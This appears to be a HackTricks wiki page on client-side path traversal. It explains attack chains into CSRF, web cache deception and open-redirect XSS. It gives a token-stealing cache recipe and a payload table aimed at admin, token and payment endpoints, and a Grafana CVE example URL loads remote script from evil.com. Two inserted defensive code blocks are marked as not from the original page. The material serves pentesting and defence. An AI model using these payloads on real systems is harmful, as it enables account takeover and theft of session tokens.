Client Side Path Traversal
Tip
Learn & practice AWS hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Information
A client side path traversal occurs when you can manipulate the path of a URL that a user will visit legitimately, or that the user can somehow be forced to visit, for example via JS or CSS. CSPT is also known as On-Site Request Forgery (OSRF) because it lets you coerce the victim's browser into hitting arbitrary paths on the same origin with their cookies, JWTs, or mTLS certificates.
Typical sources (data you control):
- Route parameters that are concatenated into paths for `fetch()` or XHR (React Router, Next.js dynamic routes, Vue router params, Angular `ActivatedRoute`).
- Stored values (profile slugs, document IDs) that are interpolated into paths inside background jobs, service workers or WebSocket URLs.
- UI components (download/export buttons, image galleries) that append user-controlled fragments or file extensions to API endpoints before the request is sent.
Typical sinks (where the traversal ends up):
- Frontend API wrappers that prefix `/api/` or `/proxy/` and automatically reuse auth headers.
- `history.pushState`/`router.navigate` helpers that rebuild URLs later during hydration.
- `<link>`/`<style>`/`@import` generated from CMS content or feature-flag payloads.
Common impacts & chains
- CSPT ➜ CSRF/OSRF: hijack authenticated `POST`/`PUT`/`DELETE` calls by escaping the intended resource path, then re-enter sensitive endpoints (password reset, payment approval, access revocation). Combine with the CSRF checklist for escalation.
- CSPT ➜ cache deception / poisoning: serve attacker-controlled JSON from public CDN keys and replay it without authentication. See Cache Poisoning and Cache Deception.
- CSPT ➜ Open Redirect ➜ XSS/SSRF: the traversal lands on an open redirect endpoint, which then bounces to attacker infrastructure serving malicious JS or SSRF payloads. Chain with Open Redirect abuses.
Example findings
- In this writeup, it was possible to change the invite URL so it would end up canceling a card.
- In this writeup, it was possible to combine a client side path traversal via CSS (it was possible to change the path where a CSS resource was loaded from) with an open redirect to load the CSS resource from an attacker controlled domain.
- In this writeup, it's possible to see a technique on how to abuse CSPT to perform a CSRF attack. This is done by monitoring all the data that an attacker can control (URL path, parameters, fragment, data injected in the DB…) and the sinks where this data ends up (requests being performed).
- Check this browser extension to monitor that.
- Check this CSPT playground to try the technique.
- Check this tutorial on how to use the browser extension in the playground.
CSPT-assisted web cache poisoning/deception
CSPT can be chained with extension-based CDN caching to exfiltrate sensitive JSON leaked by authenticated API calls:
- A frontend concatenates user-controlled input into an API path and attaches authentication headers in fetch/XHR.
- By injecting dot-segments (../) you can retarget the authenticated request to a different endpoint on the same origin.
- If that endpoint (or a path variant with a static-looking suffix like .css) is cached by the CDN without varying on auth headers, the victim’s authenticated response can be stored under a public cache key and retrieved by anyone.
Quick recipe:
- Find SPA code that builds API URLs from path parameters while sending auth headers.
- Identify sensitive endpoints and test static suffixes (.css, .js, .jpg, .json) to see whether the CDN switches to `Cache-Control: public/max-age` and `X-Cache: Hit` while still returning JSON.
- Lure the victim into visiting a URL that injects traversal into the SPA parameter so that the authenticated fetch hits the cacheable path variant (for example, `../../../v1/token.css`).
- Re-read the same URL anonymously to obtain the cached secret (token → ATO).
See details and mitigations in the Cache Deception page: Cache Poisoning and Cache Deception.
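One way to shut the recipe above down on the server side, as an added example that is not the page's own code: refuse requests whose normalized path differs from what was sent, serve only exact API routes (no static-looking suffixes), and mark API responses non-cacheable so a suffix variant never lands under a public cache key. The route table, the CDN rule and the helper names are assumptions made for this demo.

```javascript
// Added example, not from the original page: server-side handling that defeats
// the static-suffix cache-deception variant of CSPT. The route table, the CDN
// rule and the helper names are assumptions made for this demo.
const API_ROUTES = new Set(["/api/v1/token", "/api/v1/admin/users"]); // constructed
const STATIC_EXT = new Set([".css", ".js", ".jpg", ".json"]);         // what the CDN caches by extension

// Minimal POSIX-style normalization: drops empty and "." segments, pops on "..".
function normalizePath(p) {
  const out = [];
  for (const seg of p.split("/")) {
    if (seg === "" || seg === ".") continue;
    if (seg === "..") out.pop(); else out.push(seg);
  }
  return "/" + out.join("/");
}

function extname(p) {
  return (p.match(/\.[a-z0-9]+$/i) || [""])[0].toLowerCase();
}

// Vulnerable behaviour: the router ignores a trailing extension and marks the
// response public, so /api/v1/token.css returns the authenticated JSON under a
// cache key that anyone can read back.
function vulnerableHandle(rawPath) {
  const bare = rawPath.replace(/\.[a-z0-9]+$/i, "");
  if (!API_ROUTES.has(bare)) return { status: 404, headers: {} };
  return { status: 200, headers: { "Cache-Control": "public, max-age=3600" } };
}

// Hardened behaviour: decode once, normalize, refuse any request whose path
// changed (dot segments, encoded slashes), serve only exact routes, and tell
// shared caches not to store the response.
function hardenedHandle(rawPath) {
  let decoded;
  try { decoded = decodeURIComponent(rawPath); } catch { return { status: 400, headers: {} }; }
  if (decoded.includes("\\") || normalizePath(decoded) !== rawPath) return { status: 400, headers: {} };
  if (!API_ROUTES.has(rawPath)) return { status: 404, headers: {} };
  return { status: 200, headers: { "Cache-Control": "private, no-store", "Vary": "Authorization, Cookie" } };
}

// Simplified CDN rule: cache 200s by extension unless the origin forbids it.
function cdnWouldCache(rawPath, response) {
  const cc = response.headers["Cache-Control"] || "";
  if (/\b(no-store|private)\b/.test(cc)) return false;
  return response.status === 200 && STATIC_EXT.has(extname(rawPath));
}
```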
Hunting workflow & tooling
Passive discovery with intercepting proxies
- Correlate sources/sinks automatically: the CSPT Burp extension parses your proxy history, clusters parameters that are later reflected inside other requests' paths, and can reissue proof-of-concept URLs with canary tokens to confirm exploitable traversals. After loading the JAR, set the `Source Scope` to client parameters (e.g., `id`, `slug`) and the `Sink Methods` to `GET, POST, DELETE` so the extension highlights dangerous request builders. You can export all suspect sources with an embedded canary to validate them in bulk.
- Look for double-URL-decoding: while browsing with Burp or ZAP, watch for `/api/%252e%252e/` patterns that get normalized by the frontend before hitting the network; these usually show up as base64-encoded JSON bodies referencing route state and are easy to overlook without an automated scanner.
Manually instrumenting SPA sinks
Pasting a short snippet into DevTools helps surface hidden traversals while you interact with the UI:
```javascript
(() => {
  const origFetch = window.fetch;
  window.fetch = async function (input, init) {
    // fetch() accepts a string, a URL or a Request: normalize to the URL text
    const url = typeof input === "string" ? input : (input?.url ?? String(input));
    if (/\.\.\//.test(url)) {
      console.log("[CSPT candidate]", url, init?.method || "GET");
      debugger; // pause here to inspect the call stack that built the URL
    }
    return origFetch.apply(this, arguments);
  };
})();
```
- Add similar wrappers around `XMLHttpRequest.prototype.open`, `history.pushState`, and framework-specific routers (e.g., `next/router`). Watching for `init.credentials === "include"` quickly narrows down requests that carry session cookies.
- If the app stores routing hints in IndexedDB/localStorage, edit those entries with traversal payloads and reload; the mutated state is often reinjected into requests pre-hydration.
Lab & payload rehearsal
- Spin up the CSPT Playground via `docker compose up` and practice chaining traversal ➜ CSRF ➜ stored XSS flows without touching the target. Reproducing the target's router structure locally makes it easier to craft shareable PoCs.
- Maintain a scratchpad of successful dot-segment variations (`..;/`, `%2e%2e/`, `%2e./%2e/`, UTF-8 homoglyphs) and suffix tricks (`.css`, `.json`, `;` matrix params) you observed during recon so you can replay them quickly when a new sink appears.
Recent case studies (2025)
- Grafana OSS CVE-2025-4123/6023 (v11.5.0+) – A traversal gadget inside `/public/plugins/` let attackers smuggle `../../` into the plugin asset loader, chain it with Grafana's open redirect and force victims to load attacker-controlled plugin bundles. When anonymous dashboards were enabled, a crafted URL such as `https://grafana.example.com/public/plugins/../../../../..//evil.com/poc/module.js` made the browser execute remote JavaScript; if the Image Renderer plugin was installed, the same primitive could be turned into SSRF by redirecting rendering requests to internal hosts. Always test plugin asset paths, anonymous dashboards and renderer endpoints together, because a single traversal often opens both XSS and SSRF angles.
Payload cookbook
| Goal | Payload pattern | Notes |
|---|---|---|
| Hit sibling API under same origin | `?doc=../../v1/admin/users` | Works when routers simply concatenate `/${doc}`. Append `.json` if the CDN only caches static-looking assets. |
| Force SPA to follow open redirect | `?next=..%2f..%2f..%2flogin/callback/%3FreturnUrl=https://attacker.tld/x` | Combine with trusted redirectors present in the target's codebase. Chain with Open Redirect. |
| Abuse extension-based CDN cache | `?file=../../v1/token.css` | The CDN may treat `.css` as static and cache secrets returned as JSON. |
| CSRF via verb change | `?action=../../payments/approve/.json&_method=POST` | Some routers accept `_method` overrides; pair it with the traversal to retarget destructive endpoints. |
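The resolution step behind the sources/sinks described at the top of the page and the dot-segment payloads in the cookbook, as an added example that is not part of the original page: it shows what a concatenating API wrapper sends for each payload once the browser's URL parser has collapsed dot segments (including `%2e%2e`), and how an allow-listed, prefix-checked wrapper rejects them. The origin, the `/api/v1/docs/` prefix and the function names are assumptions.

```javascript
// Added example (not from the original page): how a concatenating SPA API
// wrapper resolves a route parameter, and how an allow-list plus a prefix
// check stops the traversal. ORIGIN, DOC_PREFIX and the function names are
// assumptions made for this demo.
const ORIGIN = "https://app.example";   // constructed origin
const DOC_PREFIX = "/api/v1/docs/";     // intended resource path

// Vulnerable pattern: the parameter is concatenated into the path as-is.
// The URL parser collapses "..", "%2e%2e" and friends before the request
// leaves the browser, so an authenticated fetch can land on a sibling endpoint.
function buildDocUrl(doc) {
  return new URL(DOC_PREFIX + doc, ORIGIN);
}

// Hardened pattern: allow-list the segment, encode it, and verify that the
// resolved path still sits under the intended prefix (defence in depth).
function safeDocUrl(doc) {
  if (!/^[A-Za-z0-9_-]{1,64}$/.test(doc)) {
    throw new Error("invalid document id");
  }
  const url = new URL(DOC_PREFIX + encodeURIComponent(doc), ORIGIN);
  if (!url.pathname.startsWith(DOC_PREFIX)) {
    throw new Error("path escaped prefix"); // unreachable with the allow-list, kept as a guard
  }
  return url;
}

// Returns the path a payload resolves to in the vulnerable wrapper and
// whether the hardened wrapper accepts it.
function assessPayload(doc) {
  let hardened;
  try { safeDocUrl(doc); hardened = "accepted"; } catch (e) { hardened = "rejected"; }
  return { resolved: buildDocUrl(doc).pathname, hardened };
}

// Constructed inputs: a benign id plus dot-segment variants from the cookbook.
// Note that "%2f" is NOT decoded client-side, so that variant only escapes if
// the server decodes it again; the allow-list rejects it regardless.
const SAMPLES = ["report-2024", "../../v1/admin/users", "%2e%2e/%2e%2e/v1/token.css", "..%2f..%2fv1/admin/users"];
for (const s of SAMPLES) console.log(s, assessPayload(s));
```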
References
- Cache Deception + CSPT: Turning Non Impactful Findings into Account Takeover
- CSPT overview by Matan Berson
- PortSwigger: Web Cache Deception
- Grafana CVE-2025-4123 Chained Path Traversal + Open Redirect Analysis
- Doyensec CSPT Burp Extension